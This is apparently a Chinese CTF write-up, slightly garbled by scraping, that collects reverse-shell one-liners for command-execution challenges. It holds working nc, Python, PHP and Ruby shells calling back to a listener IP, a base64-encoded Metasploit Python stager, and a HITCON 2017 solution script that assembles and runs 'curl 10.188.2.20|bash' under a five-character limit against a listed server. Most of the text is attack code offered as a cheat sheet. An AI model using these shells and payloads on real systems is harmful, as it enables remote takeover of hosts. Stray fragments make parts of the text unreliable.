CTF中一些命令執行的題目須要反彈shell,因而solo一波。php
win10 192.168.43.151 監聽端 裝有nchtml
kali 192.168.253.128 反彈端 自帶nc/bash/curl...java
***/dev/[tcp|udp]/host/port是linux設備裏面比較特殊的文件,讀取或寫入至關於創建socket調用***python
***參考文章及更多騷姿式***linux
監聽shell
反彈windows
okruby
2.1nc交互式反彈bash
或者服務器
/bin/sh | nc 192.168.43.151 7777
2.2nc -e反彈(nc支持-e參數)
***-e後面跟的參數表明的是在建立鏈接後執行的程序,這裏表明在鏈接到遠程後能夠在遠程執行一個本地shell(/bin/bash
),也就是反彈一個shell給遠程,能夠看到遠程已經成功反彈到了shell,而且能夠執行命令。***
***-n表明在創建鏈接以前不對主機進行dns解析。***
***若是nc不支持-e參數的話,能夠利用到linux中的管道符(因爲本次測試監聽端爲windows,沒有bash,全部監聽失敗,留待後續解決;能夠將6666端口對應的服務器視爲外網vps,7777端口對應的服務器視爲本地內網pc;固然,本文說起的其他反彈固然是外網vps啦)***
|| 正解
v
數據流
前提:index文件包含bash一句話
固然,不限於index文件,其餘目錄其餘文件也能夠的。
更強大的是,只要文本包含bash一句話便可,也就是說存在其餘語句也是沒影響的。
#外網[192.168.43.151]WWW目錄下放置shell.py
#!/usr/bin/python #-*- coding: utf-8 -*- import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.43.151",7777)) #外網vps os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
無需curl時
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.151",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Metasploit版(還沒有測試)
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234 import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
***相似python反彈shell***
***代碼假設TCP鏈接的文件描述符爲3,若是不行能夠試下4,5,6***
<?php $sock=fsockopen("192.168.43.151",7777);//本身的外網ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3"); ?>
無需curl時
php -r '$sock=fsockopen("192.168。43.151",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e 'f=TCPSocket.open("192.168.43.151",7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
報錯:sh: 1: 7: Bad file descriptor。文件描述符報錯,emmm...有時間再解決
無需/bin/sh(已測)
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.43.151","7777");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
目標系統是windows(待測)
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
直接貼msf了
use payload/java/shell/reverse_tcp
use payload/cmd/unix/reverse_lua
Hitcon2017
<?php
error_reporting(E_ALL);
$sandbox = '/var/www/html/sandbox'.md5('orange'.$_SERVER['REMOTE_ADDR']);
mkdir($sandbox);
chdir($sandbox);
if(isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5)
{
exec($_GET['cmd']);
}
else if(isset($_GET['reset']))
{
exec('/bin/rm -rf'.$sandbox);
}
highlight_file(_FILE_);
?>
題目大意就是對單次命令執行作了一個長度爲5的限制.
題解原理1.
演示一下確保每次執行命令長度<=5的狀況下寫入ls -t>g到_文件
>ls\\ 建立ls\文件 文件內容爲[\n]
ls>_ 建立_文件 文件內容爲_ [\n] ls\ [\n] 先把ls寫入_
>\ \\ 建立 \ 文件
>-t\\ 建立 -t\文件
>\>g 建立 >g 文件
ls>>_ 將以上文件名按照字典序寫入_文件,這裏的字典序是特殊符號,在ls\的前面,因此在生成ls\以後咱們要先ls>_,保證ls\在最前面。
出錯error(多是linux版本問題?官方Writeup就是這樣,後續會嘗試給出正確題解)
題解原理2.
利用了上文第3條curl反彈
curl 10.188.2.20|bash
py腳本
import requests
from time import sleep
from urllib.parse import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',
# generate `curl orange.tw.tw|python` # generate `curl 10.188.2.20|bash`
'>sh\ ',
'>ba\\',
'>\|\\',
# '>03\\', # '>90\\',
'>0\\',
'>20\\',
'>1.\\',
'>12\\' ,
'>7.\\',
'>10\\' ,
'>9.\\',
'>3\\',
'>\ \\',
'>rl\\',
'>cu\\',
#exec
'sh _',
'sh g',
]
r = requests.get('http://120.79.33.253:9003/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.get('http://120.79.33.253:9003/?cmd=' + quote(i) )
print (i)
sleep(0.2)
參考:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet